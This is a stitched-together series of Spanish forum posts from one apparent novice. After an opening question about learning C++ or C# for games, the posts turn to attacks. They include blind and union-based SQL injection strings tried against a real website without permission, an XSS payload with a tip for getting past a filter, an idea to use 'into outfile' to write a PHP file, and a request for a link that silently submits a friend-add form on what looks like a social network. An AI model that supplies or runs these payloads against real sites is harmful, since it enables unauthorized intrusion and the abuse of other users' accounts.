Mensajes

Bueno al fin me he decidido empezar a programar y la cosa es que tengo dos libros, uno de C++ y otro de C# y no tengo ni idea de por cual me conviene empezar...

Me he leído el principio de los 2 libros y claro cada uno defiende su lenguaje... así que si me echáis un cable os lo agradecería.

Por cierto quiero basar mi programación ante todo en videojuegos antes que en aplicaciones moviles y de PC.
Leí algo sobre C# y XNA pero no me queda claro... Me parece que es solo para Windows y Xbox pero por algo se tiene que empezar ^^

Un saludo a Todos y Gracias !!

O_O 

No se como pero bueno me ha sacado las tablas :S

Ahora bien como no lo se y me interesaría saber como por que lo ha echo con una inyección normal y ni idea...

Como no he encontrado el panel me gustaría saber si el programa tiene la opción para añadir un archivo con la inyección SQL o sino ver como ha echo la inyección para así intentarlo hacerlo yo directamente con into output...

Pero bueno maravilloso XDDDD

Ahora voy a echarle un vistazo
Aun que taba con el tema de python asi de paso apredia un poco pero weno...
Gracias ^^

[blindvuln.php?id=1 and 1=1 no sale errorblindvuln.php?id=1 and 1=2 sale error]

Buenas a todos.

He estado probando en red local un poco de Blind sql para enterarme bien de lo que era y tal pero me gustaría saber que debe de existir ya algun brute force de blind sql o si no información para crear un script en perl python ...

Lo que me gustaría crear es algo que buscase las tablas desde una lista creada para no tener que estar poniendo todo el rato una por una...

Y bueno normalmente las inyecciones Blind sql por lo que veo son asi:
blindvuln.php?id=1 and 1=1 no sale error
blindvuln.php?id=1 and 1=2 sale error

Pero me e encontrado otros casos en los que necesitas poner comillas simples por que supongo que el query lo harán con la variable entre comillas así '$variable'.
Entonces lo que hago es lo siguiente:
blindvuln.php?id=1' and 1='1 no sale error
blindvuln.php?id=1' and 1='2 sale error
Así funciona y la mayoría de scripts creados ya para buscar tablas deben de usarlo sin las comillas y por eso no me funcionan :S

La cuestión es que quiero crear algo que me haga esto:
blindvuln.php?id=1' and (SELECT Count(*) FROM NOMBRE_TABLA ) >='1
Donde NOMBRE_TABLA es la variable que usaría el programa para ir probando las tablas de un archivo, lista o lo que sea...

No estoy pidiendo que me hagáis el script simplemente info sobre algún programa existente o algún script que pudiera modificar para añadirles las comillas simples.

Gracias a todos

["><SCRIPT>alert(/hola/)</SCRIPT>]

Por lo que veo te cambia las ( ' ) por &acute; prueba sin poner las ( ' )
así:

"><SCRIPT>alert(/hola/)</SCRIPT>

Lo demas tendras que mirar en el Codigo fuente de la pagina que se genera y mirar si no te cambia tambien el < y > o que por ejemplo no aparezca script o cosas asi que los filtros quitan.

Un saludo.

Bueno el SQLi helper lo hace pero no me saca ninguna tabla :S

Y lo raro en la inyección es que si pongo alguna letra, como por ejemplo, +FROM
salen los dos errores .... que pongo @@datadir también.... que pongo hola también... no se por que pasa esto :S en cambio para ver si en hex me dejaba codifique hola en hex y salia hola y también, probé si podia hacer un XSS y codifique un script de alert para ver si lo metía y si que funcionaba, cargaba la pagina se veían los numeros 2,3,4,5.... y salia la ventanita del XSS.

Lo que pasa es por ejemplo si quiero poner el +from en hex no me deja :S o hacer into outfile para crear un archivo php el que sea ya que tengo el path entero del server :S...

Seguiré buscando ... ^^

Sips ya me imaginava que seria algo asi pero entonces las Tablas se sacan de la manga no? hay que ir probando ...

[vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error]

Buenas a todos.

El otro dia me dio por hacer una inyeccion a una web sin fines satanicos solo para pobrar si era vulnerable y lo era.. pero me pasan varias cosas y tengo las dudas

1.- Empiezo con order: vuln.php?id=69+order+by+10 no error .... 15 error .... 12 error ..... 11 no error
vale es 11....

2.- vuln.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
el servidor me tira ... Bad request ?¿?

3.- Añado "all" entre union y select y .... Hola me suelta las columnas vulnerables
vuln.php?id=-1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--

4.- Miro la version de mysql: vuln.php?id=-1+union+all+select+1,@@version,2,3,4,5,6,7,8,9,10,11--   es 4.1.22

5.- Vamos ^^ vuln.php?id=-1+union+all+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables--
y en vez de salirme nada me sale un error otra vez ... dos en concreto

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxx/home/html/vuln.php on line 40

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /var/www/vhost/xxxxxxxxx/home/html/vuln.php on line 105

He estado mirando y creo que puede ser que sea por que es MySql 4 pero bueno
Un saludo a todos y gracias

Bueno os dejo el code del from que hace el submit
Se me ha ocurrido algo pero sin resultado...
www.web.com/connect.php?fb_dtsg=AQDhE9QA&post_form_id=7992b49c9c52755f76656b080b636dc8&charset_test=€,´,€,´,水,Д,Є&id=10000240836XXXX

Código (html4strict) [Seleccionar] Expandir

<form method="post" action="/connect.php?id=10000240836XXXX&amp;hf=friend_other&amp;refid=45" onsubmit="return window.MAjaxify&amp;&amp;MAjaxify.form(event,this,&quot;async_elem&quot;,&quot;pageload&quot;);">
<input type="hidden" name="fb_dtsg" value="AQDhE9QA" autocomplete="off" />
<input type="hidden" id="post_form_id" name="post_form_id" value="7992b49c9c52755f76656b080b636dc8">
<input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є">
<div>
<div>USUARIO <br>EL USUARIO tendra que aceptar.<br><br>Agrega un mensaje personal(opcional):<br>
<textarea class="input" name="message" rows="5">
</textarea><br><label class="btn btnC touchable" data-sigil="blocking-touchable">
<input type="submit" value="Enviar" name="connect"></label> <a href="/profile.php?id=10000240836XXXX&amp;refid=45">Cancelar</a></div><div></div></div></form>

[www.web.com/añadir.php?id=1111111111]

Hola !!!

Llevo ya toda la noche rompiendome la cabeza, y al final no se que hacer....

Bueno explico:

Tengo una url tipo: www.web.com/añadir.php?id=1111111111
Al ir a esa url te pide que confirmes dandole a un boton...
Cuando confirmas te devuelve a la pagina anterior y añade a la lista.

Lo que quisiera saber es como modificando la url, automaticamente haga el submit,
el motivo es por que quiero crear un link, que al hacer click, automaticamente se
agregue sin tener que pasar por el boton algo tipo:
www.web.com/añadir.php?id=11111111111&submit
La verdad es que tiene que ser sencillo pero no se...

No quiero que me deis respuestas directas, sino cosas para leerme y entender como hacerlo, por que si no luego no aprendo xDDD.
Ahora montare un server Local y creare algo de ese tipo para ver si consigo destartalar todo esto.

PD: tiene que ser desde la URL supongo que con la solucion tendra algo de java pero es que ni idea.

Gracias y nos vemos